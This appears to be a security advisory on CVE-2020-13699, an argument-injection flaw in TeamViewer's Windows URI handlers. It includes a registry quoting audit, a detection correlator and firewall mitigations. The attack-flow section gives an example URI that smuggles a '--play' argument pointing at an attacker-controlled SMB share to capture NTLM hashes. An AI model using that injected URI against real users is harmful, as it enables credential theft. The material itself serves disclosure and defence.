CVE-2020-13699 Overview
CVE-2020-13699 is an Argument Injection vulnerability in TeamViewer Desktop for Windows that stems from improper quoting of custom URI handlers. This security flaw allows attackers to craft malicious websites that can launch TeamViewer with arbitrary parameters, potentially leading to NTLM authentication request relay attacks or hash capture for offline password cracking.
Critical Impact
An attacker can force a victim to send NTLM authentication requests by simply visiting a malicious website, enabling credential theft through relay attacks or offline hash cracking.
Affected Products
- TeamViewer Desktop for Windows versions before 15.8.3
- TeamViewer versions 8.x, 9.x, 10.x, 11.x, 12.x, 13.x, and 14.x (prior to patched versions)
- Microsoft Windows (all versions running vulnerable TeamViewer instances)
Discovery Timeline
- July 29, 2020 - CVE-2020-13699 published to NVD
- November 21, 2024 - Last updated in NVD database
Technical Details for CVE-2020-13699
Vulnerability Analysis
This vulnerability exists because TeamViewer Desktop for Windows fails to properly quote its custom URI handlers when processing parameters. The flaw is classified under CWE-88 (Improper Neutralization of Argument Delimiters in a Command), commonly known as Argument Injection.
When a user visits a malicious website, the attacker can construct a specially crafted URI that triggers TeamViewer to launch with arbitrary parameters. The vulnerability specifically affects the --play parameter handling, which can be abused to initiate outbound SMB connections to attacker-controlled servers.
The attack requires user interaction—the victim must visit a malicious webpage—but no authentication or special privileges are required from the attacker's perspective. Once triggered, the attack can lead to full compromise of user credentials through NTLM relay or hash capture techniques.
Root Cause
The root cause is inadequate input sanitization in the URI handler registration for TeamViewer. The application registers multiple custom URI schemes (teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1) without proper quoting of parameters passed through these handlers.
When Windows processes these URI schemes, it passes the entire URI string to TeamViewer. Without proper quoting, an attacker can inject additional command-line arguments that the application will interpret as legitimate parameters.
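A quoting audit for the handlers named above, as an added example that is not TeamViewer's code or part of the original advisory. It reports schemes whose registered command leaves the `%1` placeholder outside double quotes. The function names are illustrative, and `shell\open\command` is assumed as the registration location because it is the standard one for Windows URL protocols.

```python
import sys

# URI schemes the advisory lists as registered by TeamViewer.
SCHEMES = ["teamviewer10", "teamviewer8", "teamviewerapi", "tvchat1",
           "tvcontrol1", "tvfiletransfer1", "tvjoinv8", "tvpresent1",
           "tvsendfile1", "tvsqcustomer1", "tvsqsupport1", "tvvideocall1",
           "tvvpn1"]


def has_unquoted_placeholder(template):
    """True if a %1 placeholder appears outside a double-quoted span."""
    in_quotes = False
    for i, ch in enumerate(template):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "%" and template.startswith("%1", i) and not in_quotes:
            return True
    return False


def read_handler_templates(schemes=SCHEMES):
    """Windows only: read each scheme's open command from HKEY_CLASSES_ROOT."""
    import winreg  # imported here so the module still loads on other platforms
    templates = {}
    for scheme in schemes:
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                                scheme + r"\shell\open\command") as key:
                templates[scheme] = winreg.QueryValueEx(key, "")[0]
        except FileNotFoundError:
            continue  # scheme is not registered on this host
    return templates


def audit(templates):
    """Return the schemes whose command template leaves %1 unquoted."""
    return sorted(s for s, t in templates.items() if has_unquoted_placeholder(t))


if __name__ == "__main__" and sys.platform == "win32":
    for scheme in audit(read_handler_templates()):
        print("unquoted %1 in handler command:", scheme)
```
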
Attack Vector
The attack is network-based and requires user interaction. An attacker hosts a malicious website containing a crafted iframe or link with a TeamViewer URI scheme. The attack flow is as follows:
- The attacker creates a malicious webpage containing a URI such as teamviewer10: --play \\attacker-server\share\file
- When the victim visits the page, the browser prompts to open TeamViewer
- If the victim accepts, TeamViewer launches with the injected --play parameter pointing to an attacker-controlled SMB share
- TeamViewer attempts to access the remote share, automatically sending the victim's NTLM credentials
- The attacker can relay these credentials to other services or capture the hash for offline cracking
Because the vulnerability affects multiple URI handlers, any of the registered schemes can serve as the entry point, which significantly expands the attack surface.
Detection Methods for CVE-2020-13699
Indicators of Compromise
- Unexpected outbound SMB (port 445) connections to external IP addresses from TeamViewer processes
- TeamViewer process launched with unusual command-line arguments, particularly the --play parameter with UNC paths
- Browser logs showing navigation to TeamViewer URI schemes from untrusted domains
- Windows event logs indicating SMB authentication attempts to unknown external hosts
Detection Strategies
- Monitor process creation events for TeamViewer.exe with suspicious command-line arguments containing UNC paths or the --play parameter
- Implement network traffic analysis to detect outbound SMB traffic to non-corporate IP addresses
- Deploy endpoint detection rules to alert on TeamViewer processes initiating connections to external SMB shares
- Configure web proxies to log and alert on pages attempting to invoke TeamViewer URI schemes
Monitoring Recommendations
- Enable verbose logging for TeamViewer application activity and monitor for anomalous connection attempts
- Implement SIEM correlation rules to detect the combination of browser-initiated TeamViewer launches followed by outbound SMB traffic
- Review DNS logs for resolution of unusual hostnames associated with SMB share access
- Monitor Windows Security Event ID 4648 (explicit credential logon) events correlated with TeamViewer process activity
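The process-creation check and the launch-then-SMB correlation described in the two lists above, as an added Python example that is not part of the original advisory. The event records are constructed, with field names modelled on Sysmon event IDs 1 and 3; the corporate range, the browser list and the 60-second window are assumptions to adjust per environment.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from ntpath import basename

CORP_NETS = [ip_network("10.0.0.0/8")]   # assumption: the corporate ranges
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
UNC = re.compile(r"\\\\[^\\\s]+\\\S+")    # \\host\share\...
WINDOW = timedelta(seconds=60)           # assumption: correlation window

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")

def suspicious_launch(event):
    """Process-create event: TeamViewer.exe started with --play and a UNC path."""
    cmd = event.get("CommandLine", "")
    return (event["EventID"] == 1
            and basename(event["Image"]).lower() == "teamviewer.exe"
            and "--play" in cmd and UNC.search(cmd) is not None)

def external_smb(event):
    """Network-connect event to TCP 445 outside the corporate ranges."""
    return (event["EventID"] == 3 and event["DestinationPort"] == 445
            and not any(ip_address(event["DestinationIp"]) in n for n in CORP_NETS))

def correlate(events):
    """Pair each suspicious launch with external SMB on the same host soon after.
    Matching is by host and time, not PID: the SMB connection may be logged
    under a process other than TeamViewer.exe."""
    alerts = []
    for launch in filter(suspicious_launch, events):
        hits = [e["DestinationIp"] for e in filter(external_smb, events)
                if e["Computer"] == launch["Computer"]
                and timedelta(0) <= _ts(e) - _ts(launch) <= WINDOW]
        alerts.append({"host": launch["Computer"], "external_smb": hits,
                       "browser_parent": basename(launch["ParentImage"]).lower() in BROWSERS,
                       "severity": "high" if hits else "medium"})
    return alerts

# Constructed events; field names modelled on Sysmon event IDs 1 and 3.
TV = r"C:\Program Files\TeamViewer\TeamViewer.exe"
SAMPLE = [
    {"EventID": 1, "Computer": "WS-042", "UtcTime": "2020-08-10 09:15:02", "Image": TV,
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": '"' + TV + r'" teamviewer10: --play \\host.example.test\share\a.tvs'},
    {"EventID": 3, "Computer": "WS-042", "UtcTime": "2020-08-10 09:15:04",
     "Image": "System", "DestinationIp": "203.0.113.10", "DestinationPort": 445},
    {"EventID": 1, "Computer": "WS-077", "UtcTime": "2020-08-10 09:20:00", "Image": TV,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": '"' + TV + '"'},
]
```
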
How to Mitigate CVE-2020-13699
Immediate Actions Required
- Update TeamViewer immediately to version 15.8.3 or later for version 15.x installations
- Apply appropriate patches for legacy versions: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, or 14.7.48350
- Block outbound SMB traffic (port 445) at the perimeter firewall for workstations running TeamViewer
- Educate users about the risks of clicking "Open" when prompted by browsers for external application handlers
Patch Information
TeamViewer has released security patches addressing this vulnerability across all supported product versions. The fixed versions properly quote URI handler parameters to prevent argument injection. Refer to the TeamViewer Security Announcement for complete patch details.
| Version Branch | Fixed Version |
|---|---|
| 15.x | 15.8.3 |
| 14.7.x | 14.7.48350 |
| 14.2.x | 14.2.56676 |
| 13.x | 13.2.36220 |
| 12.x | 12.0.258869 |
| 11.x | 11.0.258870 |
| 10.x | 10.0.258873 |
| 9.x | 9.0.258860 |
| 8.x | 8.0.258861 |
Workarounds
- Disable or unregister TeamViewer URI handlers in the Windows registry if immediate patching is not possible
- Implement Windows Firewall rules to block outbound SMB connections from the TeamViewer executable
- Configure Group Policy to prevent browsers from launching external applications without explicit user confirmation
- Consider network segmentation to prevent workstations from initiating direct SMB connections to external networks
```bat
REM Windows Firewall rules to block outbound SMB from TeamViewer (run in an elevated Command Prompt)
netsh advfirewall firewall add rule name="Block TeamViewer SMB" dir=out action=block protocol=tcp remoteport=445 program="%ProgramFiles%\TeamViewer\TeamViewer.exe"
netsh advfirewall firewall add rule name="Block TeamViewer SMB x86" dir=out action=block protocol=tcp remoteport=445 program="%ProgramFiles(x86)%\TeamViewer\TeamViewer.exe"
```